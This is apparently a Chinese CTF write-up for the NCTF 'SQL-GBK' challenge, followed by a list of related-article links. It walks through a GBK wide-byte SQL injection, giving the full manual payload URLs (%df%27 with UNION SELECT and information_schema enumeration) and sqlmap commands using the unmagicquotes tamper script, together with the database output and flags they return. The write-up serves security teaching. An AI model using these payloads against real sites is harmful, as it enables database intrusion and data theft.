题目地址:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

进入题目后先简单尝试一下。

很明显的宽字节注入

宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码

关于宽字节注入漏洞具体说明度娘一搜就出来了,这里不再赘述。

手工注入

1、判断列数:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23

order by 3 时报错,说明只有两列。

2、各类信息:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23

sae-chinalover@123.125.23.212 : sae-chinalover : 5.5.52-0ubuntu0.14.04.1

3、库名:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23

sae-chinalover

4、表名:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,group_concat(table_name)
from information_schema.tables
where table_schema=database()%23

ctf,ctf2,ctf3,ctf4,news

5、ctf4表的列名:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,group_concat(column_name)
from information_schema.columns
where table_name=0x63746634%23

id,flag

这里注意:要将表名ctf4转为16进制

这里提供一个字符串转16进制的网站:

http://www.5ixuexiwang.com/str/hex.php

转了16进制之后记得在前面加上0x

6、flag列的数据:

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,(select flag from ctf4)%23

flag{this_is_sqli_flag}

关于flag的答案

这道题提交的答案各不相同。除了刚刚在ctf4中的flag,在ctf2中还有个nctf的flag。

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27
union select 1,group_concat(id,content) from ctf2%23

nctf{query_in_mysql}

还有一个答案是我在度娘搜到别人提交的,在ctf4,不过我在ctf4已经找不到这个答案了。

nctf{gbk_3sqli}

sqlmap跑法

1、查看有哪些库:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs

这个时侯就要用到一个脚本了:

脚本名:unmagicquotes.py

作用:宽字符绕过

2、表名:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables

3、列名:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns

4、flag列的数据:

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag

flag{this_is_sqli_flag}

这就是本题宽字节注入的两种解法。

南邮nctf-sql injection 3(宽字节注入) 手注+sqlmap相关推荐

  1. mysql宽字节注入_(宽字节注入) 手注+sqlmap

    进入题目后先简单尝试一下. 很明显的宽字节注入. 宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码. 手工注入 1.判断列数: http://chinalo ...

  2. SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用

    Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https ...

  3. sql注入_1-8_宽字节注入

    文章目录 一.sql_宽字节注入概念 二.sql_宽字节注入源码分析 三.sql_宽字节注入演示 四.sql_宽字节注入总结 一.sql_宽字节注入概念 1.了解宽字节注入前,必须先了解字符集编码:点 ...

  4. NCTF之GBK Injection另一种宽字节注入解法

    0x00题目: your sql:select id,title from news where id = '1' here is the information 0x01以前的题解是使用%df加上单 ...

  5. ctf php sql注入,【CTF-Web Learning 1】0x01 SQL注入之宽字节注入

    0x01 前言 准备系统梳理和总结提高这一年所学的关于Web方面东西,如有问题欢迎指点. 在计算机中,字符的表示与存储都离不开编码.例如ASCII,utf-8,gbk2312等.通常字符的表示都只需1 ...

  6. python实现sql宽字节注入+布尔盲注

    目录 一.注意点 二.代码 三.使用 1.获取 (简单方法) (复杂方法) 2.使用 四.测试 一.注意点 本文代码是对着pikachu漏洞靶场的宽字节注入关卡开发的,代码中的payload和参数都基 ...

  7. mysql sql宽字节注入_sql注入之宽字节注入

    宽字节注入是因为数据库使用了GBK编码,不过现在大都使用unicode国际编码,大多数网站都使用了utf-8的编码 不过既然是sql注入的一部分,也搭建环境  做做实验 实验环境: wamp集成包 实 ...

  8. sql注入--宽字节注入

    sql注入–宽字节注入 靶场:sqli-labs-master 下载链接:靶场下载链接 第32关 php源码 <?php //including the Mysql connect parame ...

  9. SQL注入教程——(四)宽字节注入

    前言 在mysql中,用于转义(即在字符串中的符号前加上"\")的函数有addslashes,mysql_real_escape_string,mysql_escape_strin ...

最新文章

  1. OSI第七层:应用层功能及介绍
  2. SAP CRM get_children 方法里面参数 iv_as_copy 有什么用?
  3. java的整数扩展,浮点数扩展,字符扩展,转义字符,布尔值扩展
  4. 美团提出具有「位置编码」的Transformer,性能优于ViT和DeiT
  5. 设置、获得对话框中 编辑框控件 EDIT 的内容
  6. Adobe AIR教程:ANE面向IAP的测试和开发
  7. ubuntu14.04安装V-REP和用户使用手册
  8. 2.PHP 扩展开始以及内核应用(1) --- PHP 变量在内核中的实现
  9. 【滤波器】基于matlab脉冲响应不变法+双线性变换法数字滤波器设计【含Matlab源码 884期】
  10. 【SSDP 协议介绍】
  11. KEIL 生成 Bin\axf 文件
  12. Python selenium —— selenium与自动化测试成神之路
  13. IDEA代码文件导航-Navigate使用技巧
  14. Wifi热点java_Wifi热点实现文件传输
  15. 2010年3月份中国物流与采购联合会发布中国制造业采购经理指数为55.1%
  16. excel 冻结多列窗口
  17. 【华人学者风采】梁应敞 电子科技大学
  18. python-yaml文件使用(PyYAML)
  19. 如何把 Excel 数据按分类拆分为多个
  20. 【日语】日语单词 ---- 身体部位

热门文章

  1. DataWhale基础算法第一次作业---线性回归
  2. TimesTen 应用层数据库缓存学习:16. Aging策略与AWT缓存组
  3. 怎样将应用程序发布到Apple store上去 (四)
  4. OpenGL之弧度和角度的换算
  5. 安装最新版jupyter和anaconda的一个大坑
  6. 销售技巧:学会这6个方法,没有接近不了的客户!(一)
  7. python表白图形代码_python表白代码 python皮卡丘编程
  8. ROS: Publisher and Subscriber
  9. FPS最精确计算方式
  10. SSM框架+VUE+Mysql实现的疫苗预约接种管理系统(功能包含分角色,登录/注册、疫苗管理、接种点管理、用户管理、疫苗类型管理、我的预约、预约接种管理、关于等)